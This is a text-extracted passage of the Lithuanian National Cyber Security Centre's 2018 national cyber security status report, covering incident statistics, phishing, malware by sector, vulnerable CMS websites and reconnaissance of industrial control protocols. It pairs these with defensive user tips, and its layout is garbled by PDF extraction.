national cyber security status report 2018 · of the martynas mažvydas national library of...
TRANSCRIPT
2018
NATIONAL CYBER SECURITY STATUS REPORT
National Cyber Security Centre under the Ministry of National Defence
National Cyber Security Status Report 2018
Translation Public Special Education and Counseling Center
Translation editors: Egle Ivanovaitė, Laimonas Brazaitis
Graphic designer Raimonda Namikaitė
Circulation: 500 units. Order GL-230
Ministry of National Defence of the Republic of Lithuania,
Totorių str. 25/3, LT-01121 Vilnius
Layout by the Visual Information Section of the General Affairs Department of
the Ministry of National Defence, Totorių str. 25/3, LT-01121 Vilnius.
Printed by the Military Cartography Centre of the Lithuanian Armed Forces,
Muitinės str., Domeikava, LT-54359 Kaunas District.
NATIONAL C YBER
SECURIT Y CENTRE
UNDER THE MINISTRY
OF NATIONAL
DEFENCE
9786094
121722
9786094
121722
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 2 ] [ 3 ]
ISBN 978-609-412-172-2
TABLE OF CONTENTS
Terms [4]
Abbreviations [5]
Introduction [6]
Summary [8]
National cyber threat map [10]
Cyber security challenges in 2018 [14]
Statistics of cyber incidents [15]
Social engineering [17]
Poliferation of malware [20]
Vulnerable websites CMS [24]
Electronic Communication Network Reconnaissance [29]
Reliability of contractors and software [33]
DDoS cyber incidents and equipment vulnerabilities [36]
Notable cyber incidents [38]
Information attacks [40]
Increasing cyber security resistance [44]
Organizing cyber security [45]
Creating a cyber security environment [47]
Conclusions and recommendations [52]
Conclusions [53]
Recommendations [54]
The bibliographic information about the publication is available in
the National Bibliographic Data Bank (NBDB)
of the Martynas Mažvydas National Library of Lithuania.
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 4 ] [ 5 ]
TERMS
Critical Information Infrastructure – a communications and information system or part of it, a group
of communications and information systems, in which the occurrence of a cyber incident might have a
major negative impact on the national security, economy of the country, and interests of the state and
the public.
Critical service – a service non-provision or disruption of which would have a significant negative im-
pact on national security, state economy, and public interests.
Cyber incident – an event or activity in cyber space which might pose or poses threat or has a negative
effect on the accessibility, authenticity, integrity and confidentiality of digital information transmitted by
use of communications and information systems or processed in such systems, also which might disrupt
or disrupt the operation, management of communications and information systems and the provision of
services to such systems.
Cyber security entity – an entity which controls and/or manages information resources of the state,
manager of critical information infrastructure, service provider of public communications networks and/
or public digital communication services, provider of digital information hosting services and providers
of digital services.
Communication and Information System – a network of electronic communications, an information
system, a registry, industrial process management system and digital information retained, processed,
restored or transmitted for the purpose of their management, use, protection and maintenance.
State information resources – totality of information managed by the institutions in the exercise of
their statutory functions, that is processed by means of information technology, and of information tech-
nology tools used to process information.
ABBREVIATIONS
Botnet – network of computers or devices of Internet of Things that can execute distributed-deni-
al-of-service cyber attacks
DDoS – distributed-denial-of-service cyber attack
IoT – devices of Internet of Things, for example smart TVs, smartphones, etc.
IT – Information Technologies
CII– Critical Information Infrastructure
NCSC – National Cyber Security Centre under the Ministry of National Defence
OS – operating system
SW – software
CIS – communication and information system
TLD – top level domain name system (for example, with suffix “.lt”)
Serv – server
CMS – content management system
SIR – state information resources
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 6 ] [ 7 ]
INTRODUCTION
From the cyber security viewpoint, numerous events have occurred in Lithuania in 2018. Following the
adoption of amendments to the Law on Cyber Security by the Seimas of the Republic of Lithuania on 19
December 2017, the capacities of CERT-LT1 of the Communications Regulatory Authority, the Govern-
ment Communications Centre under the Ministry of National Defence, and the National Cyber Security
Centre under the Ministry of National Defence (hereinafter referred to as the NCSC), were integrated.
Since 1 January 2018, the NCSC has become the central Lithuanian authority of cyber security that is
responsible for the integrated management of cyber incidents, monitoring and controlling the imple-
mentation of cyber security requirements, for ensuring Critical Information Infrastructure (hereinafter
referred to as CII) protection and cyber security of other entities. Full attention to cyber security issues,
joint efforts of politicians and experts enabled the gathering of skill set at national level, establishing a
clear direction for strengthening cyber security and specific actions to be taken over a period of several
years. Lithuania‘s efforts in the area of cyber security have not gone unnoticed – Lithuania is among the
leaders in terms of the Global Cyber Security Index. 2
The new cyber security guidelines were established by the Lithuanian Cyber Security Strategy approved
in 2018, which sets a unified direction for strengthening cyber security by 2023. The General Data Protec-
tion Regulation has prompted entities to be more proactive in managing cyber risks related to the pro-
tection of personal data. Lithuania has also internationally engaged in building competencies of cyber
security. In 2018, Lithuania started implementing the European Union Permanent Structured Coopera-
tion Project „Cyber Rapid Response Teams and Mutual Assistance in Cyber Security“, which was initiated
in 2017. The implementation of organisational and technical cyber security requirements for cyber secu-
rity entities (especially CII managers), the development of monitoring capacity of the NCSC contributed
significantly to improving cyber security in Lithuania.
Technological development, popularity of IoT not only facilitate everyday life, but also create new chal-
lenges. Antivirus software (hereinafter referred to as the SW), firewalls and other cyber security tools
are unable to prevent all cyber threats. Technological solutions cannot fully protect and do not protect
against new vulnerabilities and the emergence of the ways in which they can be exploited. Awareness,
IT literacy and critical thinking remain the principals ways to combat cyber threats. In order to promote
cyber security relevance and inform the society about the cyber security status in Lithuana, the NCSC
provides the third National Cyber Security Status Report. In this report, users are provided with key rec-
ommendations on how to manage the risks associated with cyber threats.
1 CERT-LT – National Team of Information Technology Experts ready to respond to cyber incidents at national level (Compu-ter Emergency Response Team)
2 ITU – International Telecommunication Union, https://www.itu.int/en/ITU-D/Cybersecurity/Pages/global-cybersecuri-ty-index.aspx
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 8 ] [ 9 ]
SUMMARY
The National Cyber Security Status Report is based on NCSC‘s information about cyber incidents in Lithuania, also on the information collected and provided by cyber security entities and the Strategic Communication Depart-ment of the Lithuanian Armed Forces information. The summary on the essential elements of this report is given below.
The cyber incident statistics, which has been growing for a long time, slightly declined in 2018. 53,183
cyber security incidents were registered in Lithuania, i.e. 3% less than in previous years. However, the
complexity of cyber incidents has increased, attacks are becoming more sophisticated and it is impossi-
ble to investigate them by automated means. The NCSC has investigated 914 cyber incidents of high and
medium significance, and that is 41% more than in 2017. Furthermore, in 2018, 21% more incidents due
to vulnerabilities in equipment were registered. This is related to the increasing use of IoT devices.
In 2018, the largest number of malware was detected in the government (39%), energy (20%), and for-
eign affairs and security policy (19%) sectors. The trend of malicious cyber activity remains a threat be-
cause the critical sectors in Lithuania are the target.
In 2018, the NCSC captured 25% more attempts to infiltrate into the CIS that are based on social engineer-
ing methods than in 2017. By pretending that they are the managers of organisations and using social
engineering methods, scammers continue trying to force the employees of organisations to make money
remittances. Individuals with wicked intent also try to swindle money from the users by offering to pur-
chase the goods on counterfeit websites. Social engineering methods are also used to execute malware
on organizations and users‘ computers.
Last year, the NCSC conducted cyber security checks on all Lithuanian websites (.lt). Unfortunately, as
many as 52% of 52,000 identified websites in Lithuania with CMS are vulnerable. The most vulnerable are
websites with Wordpress and Joomla CMS.
Software code may be safe, but mobile apps often ask for excess data or access to device functionality.
This conclusion was reached when the NCSC initiated an analysis of Yandex.Taxi mobile app. Usually, us-
ers give such access by agreeing to the terms of use of the software without thinking that their data, unre-
lated to the service provided by the SW (such as contact details, recordings from the device microphone,
photo gallery, etc.), may be leaked or accessible to third parties without their knowledge and consent.
In 2018, negative information activities were targeted at the most important areas of Lithuanian national
security. A total of 2 456 cases with features of negative information activities were identified, i.e. an
average of about 205 cases per month. Maximum activity of negative information was captured in the
area of defence (29%). Such intensity was not only triggered by the flow of propaganda that usually
affects Lithuania, but also by the events of relevance in the country that were artificially escalated from
unfriendly sources.
Among cyber security entities implementing the organizational and technical cyber security require-
ments set by the Government of the Republic of Lithuania, the CII managers implemented 63% organiza-
tional and 50% technical cyber security requirements (last year the CII managers implemented only 26%
of organizational and 6% of technical cyber security requirements).
In order to fully strengthen the cyber security environment, in 2018, the Ministry of National Defence and
the NCSC signed a cooperation agreement with the media. Last year, the Ministry of National Defence, in
cooperation with the partners, also began establishing a Regional Cyber Security Center in Kaunas city.
The decision was made to develop a Secure National Data Transmission Network that connects institu-
tions ensuring vital functions of the state.
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 10 ] [ 11 ]
Increased Social engineering
Remained high Prevalence of malware
Remained high Vulnerable websites
New Device vulnerabilieties
IncreasedElectronic communications
network reconnaissance
NewUnreliability of contractors and /
or software
Decreased Interference with electronic services
C y b e r t h r e a tI n f l u e n C e
On national security On business and SIR On residents
Social engineering
NATIONAL CYBER THREAT MAP
Table 1. In 2018, cyber security threats and trends compared to 2017.
The impact of cyber incidents based on social engineering methods was high in 2018. 25% more cases of
use of social engineering methods, through application of which the Internet users were manipulated in
terms of their indiscretion, trustyness and lack of knowledge, in the cyber space were registered. Fraud-
ulent and misleading e-mails continued to be sent, messages with malicious code or links to malicious
websites continued to be distributed. These methods enabled individuals with wicked intent to infiltrate
into computers of cyber security entities, businesses and residents, to collect information, or add com-
puters to Botnets, and engage in malicious activity. The ordinary users with a lack of cyber security and
IT literacy, that becomes the main reason of overwhelming the CIS, are at the greatest risk. This threat is
also of great relevance for business entities which lose confidential information or suffer direct financial
loss due to cyber incidents based on social engineering methods (table 2).
Table 2. Influence of social engineering threat
The prevalence of malware is also related to the overwhelmed user and IoT devices. This means that
the security measures did not work, the vulnerabilities of the software were exploited, the system was
hacked, and the confidentiality, availability and integrity of information and / or services were affected.
The threat of the of malware prevalence in Lithuania is considered as high. Detection of malware in CII
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 12 ] [ 13 ]
sectors poses a particular risk of affecting critical services of strategic importance that may have an effect
at national and regional level (table 3).
Table 3. Influence of malware threat
A large number of websites in Lithuania are vulnerable, mainly due to non-updated CMSs. Cyber security
and business entities underestimate potential damage they would suffer as a result of cyber incident,
they do not regard their websites as an important information asset that is necessary for their activities,
and they also overlook the fact that some websites store personal data. For this reason, cyber incidents
against the websites of cyber security entities would result in financial loss due to non-compliance with
the provisions of the General Data Protection Regulation (table 4). It should be noted that, according to
the current list of monitoring of the public sector websites of the NCSC, it can be stated that the situation
in the public sector has improved. In 2018, the number of websites that are very easy to hack fell to 1%.
Table 4. Influence of vulnerable websites threat
C y b e r t h r e a tI n f l u e n C e
On national security On business and SIR On residents
Prevalence of malware
In 2018, the NCSC detected 21% more device vulnerabilities than in 2017. This is partly due to the prev-
alence of IoT devices. Furthermore, due to the current lack of regulation both in Lithuania and in the
European Union, users purchase devices that are not subject to additional safety requirements. The de-
vices purchased have open ports, unsafe passwords, they do not encrypt communications, have unsafe
architecture and software code (table 5).
Table 5. Influence of device vulnerabilities threat
C y b e r t h r e a tI n f l u e n C e
On national security On business and SIR On residents
Vulnerable websites
Electronic communications network reconnaissance is related to the collection of information about CIS.
These activities may not be malicious. However, since this kind of information collecting is pervasive, it
can be said that interest in CIS, when devices and information about them is found after basic scans, can
C y b e r t h r e a tI n f l u e n C e
On national security On business and SIR On residents
Device vulnerabilities
be the first step in performing such activities. Interfaces of devices involved in technological processes
with Internet are of particular concern. After collecting information about such devices, individuals with
wicked intent may try to interfere with services that could also have physical effects that affect not only
households (for example, heating), businesses (for example, product manufacturing), but also nationally
important services (for example, power supply, distribution or water purification processes) (table 6).
Table 6. Electronic communications network reconnaissance threats
C y b e r t h r e a tI n f l u e n C e
On national security On business and SIR On residents
electronic commu-nications network
reconnaissance
In 2018, a new threat of cyber security was observed in Lithuania, specifically contractor reliability prob-
lem. In 2018, due to contractor reliability problem, the Government of the Republic of Lithuania has
banned the use of Kaspersky LAB software in the SIR and CII. Additionally, the NCSC performed Yandex.
Taxi app evaluation and made public recommendations not to use this software. The relevance of the
problem also relates to the fact that, from a technological point of view, products or services may be safe,
but not equipment or service providers. Having over-access opportunities, as well as having confidential
information at their disposal, entities may pass on information about vulnerabilities or potential vectors
of malicious activity to third parties, or may themselves be malicious intermediaries (Table 7).
Table 7. Influence of threat of unreliability of contractors and / or equipment suppliers
C y b e r t h r e a tI n f l u e n C e
On national security On business and SIR On residents
unreliability of contractors and / or
equipment suppliers
The level of threat of interference with electronic services decreased in 2018, because 40% less DDoS
attacks were captured. This was influenced by the use of anti-DDoS security measures in the Lithuanian
Internet infrastructure, as well as services offered by Internet Service Providers and other solutions that
help prevent cyber incidents of this kind (table 8).
Table 8. Influence of threat of interference with electronic services
C y b e r t h r e a tI n f l u e n C e
On national security On business and SIR On residents
Interference with electronic services
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 15 ]
CYBER SECURITY
CHALLENGES
IN 2018
Statistics of cyber incidents
In 2018, the NCSC registered 53,183 cyber inci-dents in Lithuania, 3% less than in 2017.
The number of complex attacks increased – the NCSC investigated 914 cyber incidents of high and medium significance, 41% more than in 2017.
The NCSC identified 21% more vulnerabilities in Internet devices.
After evaluating cyber incident statistics, a slight decrease of 3% of registered incidents was recorded
(table 9). In previous years, the number of cyber incidents in Lithuania increased by 10-20% annually. In
2018, the number of interferences with electronic services, electronic data counterfeiting and integrity
violations decreased significantly. The comparison of malware, the number of incidents of information
systems and device vulnerabilities with these types of cyber incidents shows that the difference is huge.
Compared to 2017, the number of devices with vulnerabilities has increased by one fifth (21%) in 2018.
While overall cyber incident statistics show a small decrease in registered incidents, cyber incidents have
become more sophisticated, i.e. number of incidents of high and medium significance, that had to be
processed manually by the specialists of the NCSC, increased by 41%, to 914 incidents (in 2017 – 536). In
2018, 52,269 incidents were processed by the NCSC using automatic means (in 2017 – 54,414).
Cyber Incident Detection Tools, which operate automatically, processed fewer events than before be-
cause malware code have become more sophisticated and more difficult to detect under predefined
rules and indicators. Advanced algorithms that can process more information are required to detect and
prevent such cyber incidents and malware.
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 16 ] [ 17 ]
Type Number in 2018Change compared
to 2017
Malware 10 822 –5%
Hacking (overwhelming CIS) 10 059 –8%
CIS interference (DoS) 31 –40%
Counterfeiting of electronic data 872 –30%
Integrity violations 24 –50%
Device vulnerabilities 29 747 +21%
Of different nature 1 628 –76%
Total of incidents: 53 183 –3%
Table 9. Information of the NCSC on cyber incidents, and change compared to 2017. Social engineering
Using social engineering methods fraudsters tried to swindle money from the users by asking them to make money remittances, by pretending the heads of organisations, by offering to buy goods on fake websites.
Currently, social engineering methods are not limited to e-mails, the creation of fake websites or sending messages on social networking web-sites – individuals with wicked intents can call by phone, try contact in other ways.
Cyber incidents based on social engineering methods involve manipulating user actions on the Internet
and fraud. Information is collected, malware is distributed, and vulnerabilities are exploited during them
(fig. 1 ).
Reconnaissance Weaponization Delivery Exploitation InstallationCommand and Control
Actions on objective
Fig. 1. Classification of cyber incidents based on social engineering methods by Lockheed Martin “Cyber Kill
Chain“ model 3
According to 2018 statistics, phishing that includes fraudulent attempt to obtain passwords by e-mail,
sending messages on social networking websites or touting of users to fake websites, was the most pop-
ular cyber incident in Lithuania that is based on social engineering methods. Individuals with wicked in-
tents also often use these methods to gain financial benefits. The incidence of cyber-incidents of this type
is particularly high during festive periods when users are touted with discounts and offers that seem valu-
able. There are frequently cases where individuals with wicked intent, who pretend they are the CEO‘s of
companies, give orders to accountants to make money remittances (example, fig. 2).
3 https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 18 ] [ 19 ]
No Threat User tips
1.The user will click on the link to the malicious page.
Move a mouse cursor over the link and check that the website address you are displaying is genuine, make sure that the address does not contain grammatical errors, the address name is logical and easy to read.
2.The user will enter his / her password on the counterfeit website.
Make sure the session with the website is encrypted, i.e. a SSL certificate is used (the website address must begin with the https tag), use multi-factor authentication tools (such as password, mobile device, fingerprint).
3.The user will reveal his / her login passwords to an individ-ual with wicked intent.
Protect your login passwords by no means keeping them open at work, on your computer, or on your mobile phone.
4.The user will make a cash re-mittance to individuals with wicked intent.
Be critical about online ads and those sent by e-mail (es-pecially be critical about big discounts offered); check requests to make cash remittances by other means, for example, verify the circumstances by phone call.
5. The user will install malware.
Do not open document content, files being sent, and soft-ware that have been sent or downloaded from an unreli-able source (for example, from sources of illegal software distribution).
6.
The user will give himself / herself in to manipulations of an individual with wicked intent.
Do not make precipitous actions, avoid emotions, fully clarify the necessity of the actions requested.
1
2
3
4
5
6
2016 - > 106 000
2017 - > 188 500
2018 - > 250 000
Fig. 2. The “director’s” request to transfer funds that was received from a fake e-mail address.
Another example: because of malicious social engineering methods, the users install malware in CIS that,
for example, starts running after the addressee opens the e-mail sent and reading its contents is enabled
(fig. 3).
Fig. 3. Title of documents distributed by e-mail after pressing on which macro command to download malware
is activated
Individuals with wicked intent may also call by phone and introduce themselves as CIS administrators
or, by pretending to be thankful customers, they may try to donate or offer external storage media with
malware on it.
Table 10. Basic ways of managing social engineering threats
After assessing monitoring data, in 2018, 25% more cyber incidents that are based on social engineering
methods were recorded (fig. 4). The reason for this is the exploitation of a human factor for cyber attacks.
Cyber security entities devote considerable resources to increase CIS resilience, technical infrastructure
protection, to protect infrastructure by technical means. However, too little attention is still paid to edu-
cating and raising awareness among employees. Unfortunately, in the minds of individuals, cyber securi-
ty continues to be a matter of competence IT professionals and hardware. In the event of cyber incident,
responsibility is usually transferred to the user, who is usually not properly informed or educated before
the event, how to manage the cyber security risks.
Fig. 4. Trends in Social Engineering in 2016–2018
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 20 ] [ 21 ]
Profileration of malware
In 2018, most cases of malware were detected in government, energy, foreign affairs and security policy sectors.
The prevalence of malware is associated with overwhelming CIS, when attackers, after exploiting vul-
nerabilities, try to install malware on CIS infrastructure. The executed malware enables an access to the
infrastructure and attacker could perform other malicious activities (fig. 5).
Reconnaissance Weaponization Delivery Exploitation InstallationCommand and Control
Actions on objective
Fig. 5. Classification of malware by Lockheed Martin “Cyber Kill Chain“ model
The tools used by the NCSC detect the malware before it is installed on the infrastructure, for example, an
activated e-mail attachment tries to establish a connection to download malware (fig. 6). The trend was
noticed that users are sent links to cloud services websites (for example, onedrive.com, dropbox.com)
that contain files with links to other malicious websites.
Fig. 6. „Macros team“ is activated in Windows OS “.docx“ document that activate “powershell“ functionality and
tries to download malware to CIS
Another case is when the attacker already has taken over control of the CIS device and has unhindered
access to the system and can perform malicious activity, are captured during investigations of cyber in-
cidents (fig. 7).
Fig. 7. Information on successful malicious remote access to CIS
In 2018, the NCSC has registered 10,822 cyber incidents associated with malware. Compared to previous
years, the number of incidents of this type decreased by 5%. According to the NCSC classification, the
NCSC registered 470 cyber incidents of medium and high significance that are related to malware detec-
tion, while in 2017 498 cases were identified (fig. 8).
In 2018, with the help of the technical measures used by the NCSC, most of malware was detected in
the government 4 (39%), energy (20%) as well as foreign affairs and security policy (19%) sectors (fig. 9).
The trend is still threatening because critical infrastructures on which services of public interest depend
continue to be the target.
4 According to the Critical Information Infrastructure Identification Methodology, the sector of government is comprised of the service of the performance of state authority functions and handling of critical state information resources (informati-on systems and registers of category one)
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 22 ] [ 23 ]
No Threat User tips
1.By taking advantage of the vulnerability, the attacker will install malware on CIS.
Use legal OS and software, use antivirus software, periodi-cal scanning of the device, instantly install manufacturer‘s software updates after they appear.
2. The user downloads malware.
Do not download files from unreliable sources, install pl-ugins in your browser to identify malicious websites, use antivirus software to scan suspicious files, check dowload-ed files using the tools provided by NCSC .*
3.Malware from infected USB stick will run automatically.
Do not use unreliable, unverified memory drives or oth-er devices that connects via USB stick. Constantly format them, disable automatic file execution.
4. Data encryption.Back up your data periodically, keep backup copies sepa-rately (for example, on an external storage device).
5.Malware will grant accesss for the attacker to access confi-dential information.
Encrypt confidential information, protect it with a secure password. Use cryptographic tools to transmit informa-tion, such as email encryption.
6.Your computer will be infected through the CIS network.
Use network segmentation, several filtering tools (such as network and workstation firewall), physically separate important CISs.
39%
20%
19%
11%
5%5%
63%
37%
63%
1%
1
2
3
4
5
6
* https://www.nksc.lt/irankiai.html
Fig. 8. Cyber incidents of medium and high significance that are related to malware detection, by entities
CII manager, SIR managers and handlers
Legal entities
Other
Public security and legal order sector
National defence sector
Financial sector
Foreign affairs and security policy sector
Energy sector
Government sector
Fig. 9. Malware detection by sectors
Table 11. Mitigation of malware threats
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 24 ] [ 25 ]
3000
2500
2000
1500
1000
500
02016 07 01 2016 10 01 2017 01 01 2017 04 01 2017 07 01 2017 10 01 2018 01 01 2018 04 01 2018 07 01
Vulnerable websites CMS
Half of the 52,000 websites in Lithuania with CMS are vulnerable.
Websites with Wordpress, Joomla CMS are the most vulnerable.
Websites that have vulnerabilities can be used to install malware, to hack, and gain access to data, for ex-
ample, through an administrator account. It should be noted that the information collected by the NCSC
on vulnerable websites does not de facto imply that they are overtaken or vulnerabilities were exploited.
However, this shows that there is a real chance of malicious access to the site‘s CMS or information stored
in it (fig. 10).
An example may be as follows: in 2018, the NCSC investigated hacking into the website “skardzius.lt” on
the server of the Seimas of the Republic of Lithuania (fig. 11). Website owners often leave open access to
the accounts of website CIS administrator, do not turn on the restriction of the number of login attempts.
Consequently, individuals with wicked intent can hack into such websites by automated means – to carry
out so called “brute force” cyber attack.
Reconnaissance Weaponization Delivery Exploitation InstallationCommand and Control
Actions on objective
Fig. 10. Classification of cyber incidents on vulnerable websites by Lockheed Martin “Cyber Kill Chain“ model
Cyber threats in respect of websites are mainly due to the use of the most popular CMSs, such as Word-
press, and plugins associated with this CMS. When outdated CMSs are used, such websites become the
targets of the attackers. After finding vulnerabilities individuals with wicked intent can exploit them and
customize tools for malware installation.
Fig. 11. Attempts to access the website skardzius.lt using „wp-login.php“ functionality
In 2018, the NCSC conducted two checks on website cyber security: assessment of CMS cyber security for
all Lithuanian websites (.lt domain)5 and assessment of website security of the cyber security entities of
Lithuanian public sector 6.
Over 110,000 Lithuanian top-level domain websites and about 1,200 public sector websites were ana-
lyzed. The CMS security assessment of all Lithuanian websites was performed by identifying vulnerable
CMSs. Public sector survey was conducted based on statistical model by analysing information sent by
server during normal web browsing (GET request HTTP header banner), technical data obtained from
public directory databases, and information about the host servers obtained by means of passive scan-
ning, and on softwares of Website Broadcasting Services. Network services running on TCP / IP protocol,
with ports 80 and 443 were assessed.
The survey found that 32% use WordPress Open Source CMSs, 5% use Joomla, and 9% use other CMSs. In
the public sector, 25% of websites use Wordpress CMS, and 9% use Joomla CMS (table 12).
5 Only websites whose CMSs could be identified and websites that use the most popular open source CMSs were assessed during the survey, because they attract the most attention of individuals with wicked intent, and they are constantly under the attempts to be overtaken using automated tools.
6 The list of public sector websites was based on information provided by the ministries and municipalities
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 26 ] [ 27 ]
Content management system
General prevalence in Lithuania
Prevalence in the public sector
WordPress 32% 25%
Joomla 5% 9%
Other (Drupal, OpenCart, PrestaShop, Wix, Weebly, CMS Made Simple, Fresh Media, Idamas, CM4all, etc.)
9% 13%
Undetermined 54% 53%
100%
80%
60%
40%
20%
0%
Secure
Vulnerable
48%
52%
2017 2018
54%
11%
24%
11%
68%
1%
21%
10%
Secure
Difficult to hack
Easy to hack
Very easy to hack
Table 12. CMSs summary
After evaluating the results of the Lithuania-wide CMS survey, 52% of identifieble websites in Lithuania
are vulnerable to cyber attacks (fig. 12). Some of them have very dangerous vulnerabilities, and 9% of
them have extremely high vulnerabilities.
Fig. 12. 2018 assessment of cyber security of Lithuanian (.lt domain) websites according to information of CMS
vulnerabilities
It was found that 32% of investigated Lithuanian public sector websites are vulnerable to cyber attacks.
The vast majority (21%) of vulnerable public sector websites can be easily hacked because the methods
and tools of such hacking are available on the Internet. Therefore individuals with wicked intent can eas-
ily use them. The NCSC worked directly with administrators whose websites had critical vulnerabilities
(„worst of the worst“), informed and supported the owners of public sector websites on how to prevent
vulnerabilities. As a result, statistics show that in 2018 the number of websites that are very easy to hack
decreased to a minimum (fig. 13).
Fig. 13. Vulnerable public sector websites. *
* Very easy to hack – technical knowledge or special programming skills are unnecessary to hack. Instructions for necessary actions are easily found on the Internet. Easy to hack – skills and knowledge, that are usually published in closed groups, are required for hacking. Difficult to hack – knowledge of qualified professionals, often of several attackers, is required for hacking, because vulnerabilities are not yet publicly available.
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 28 ] [ 29 ]
No Threat Recommended ways to manage threat
1.An attacker connects to CMS via a user or administrator account.
Change the login addresses of the website CMS adminis-trator and users, periodically change passwords, enable limited number of attempts to login.
2.An attacker exploits the vul-nerabilities of the website.
Constantly update OS of the server, CMS and related plugins, do not use unnecessary CMS plugins, use web application firewall, close unused ports, scan website for vulnerabilities, and regularly check logs for unauthorized access or other, install a “reverse proxy“ solution to pre-vent the attacker to identification of CMS.
3.An attacker installs malware on the website.
Configure firewalls in a way that CMSs of websites could be only logged in from reliable IP addresses (white listist-ing of the IP addresses).
4.The hosting service provider does not guarantee cyber security for the website.
When website development, embedding and mainte-nance services are purchased, the contract should include a requirement for the service provider to ensure the cyber security of the website, protection against hacking, to en-sure the compliance of the website with the organization-al and technical cyber security requirements established by the Government.
5.
Information, communication traffic is intercepted, user data and / or login passwords are taken over during the login to a website.
Install a SSL certificate on a website that will secure the encrypted connection. It is one of the most effective cyber security tools for websites.
6. The availability of the website is down.
Use web application firewall, order more bandwidth, pur-chase additional preventive DDoS services, for example, from a website hosting provider.
1
2
3
4
5
6
Table 13. Mitigation of vulnerable websites threats Electronic Communication Network Reconnaissance
Energy, government and defence sectors are the most scanned sectors in Lithuania.
Electronic network reconnaissance is related to the collection of information on CISs of cyber security en-
tities or ordinary users. The most popular way - using Internet scanning tools, to search for active, online
services and associated ports. Electronic communications network reconnaissance of this kind does not
necessarily mean that malicious activity will be carried out. However, in most cases this is the first step in
identifying vulnerable CIS spots, custimization of malware and delivery to them (fig. 14).
Fig. 14. Classification of Electronic Communication Network Reconnaissance by Lockheed Martin “Cyber Kill
Chain“ model
Last year, the increasing intensity of Electronic Communications Network Reconnaissance of the SIR and
CII managing entities was observed (fig. 15).
Reconnaissance Weaponization Delivery Exploitation InstallationCommand and Control
Actions on objective
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 30 ] [ 31 ]
40%
35%
30%
25%
20%
15%
10%
5%
0%
Quarter 1 Quarter 2 Quarter 3 Quarter 4
17%
21%
27%
35%
16%18%
16%
10% 9%6% 5%
3% 3% 3% 3% 3% 2%
BACn
et
Siem
ens S
7
Mod
bus
Nia
gara
Trid
ium
Fox
DN
P3
Ethe
rNet
/IP
Mits
ubis
hi E
lect
ric M
ELSE
C-Q
PCW
orx
Om
ron
FIN
S
Red
Lion
Con
trol
s Crim
son
V3
IEC
6087
0-5-
104
Code
sys
ProC
onO
S
GE
Indu
stria
l Sol
utio
ns-S
RTP
HAR
T-IP
16%
13%12% 11%
9%8%
7%
4%3%
2%
4%3%
2%3%
2%
Fig. 15. Intensity of port scanning of entities providing critical services in 2018
During scanning, information is collected about organizations‘ Internet-connected devices, their types,
enabled services, vulnerabilities, or open ports. After collecting this information, further cyber attacks are
planned, or, using publicly available information and tools, an attempt is made to hack into infrastruc-
ture of organisations. According to NCSC, the sources of the scans are - Russia, China, USA (table 14). It is
important to note that the primary source of scans does not necessarily represent the actual geographic
location from which the scans are made.
Table 14. Primary information of the sources of Electronic Communications Network Reconnaissance
Country Percentage
Russia 17%
China 13%
United States of America 12%
Lithuania 10%
The Netherlands 8%
Ukraine 6%
Other countries (94) 34%
The cyber security entities providing critical services in the energy, national defence, government and
finance sectors were the most scanned in 2018.
Cyber security of operational control systems and reconnaissancedevices used in these processes, intel
cases represent one of the priorities of the NCSC activities (fig. 17). It should be noted that no cases were
detected where such devices in the CIS of SIR managers and handlers, and of the CII managers had a di-
rect link to the Internet. Despite the fact that the devices are not directly connected to the Internet, there
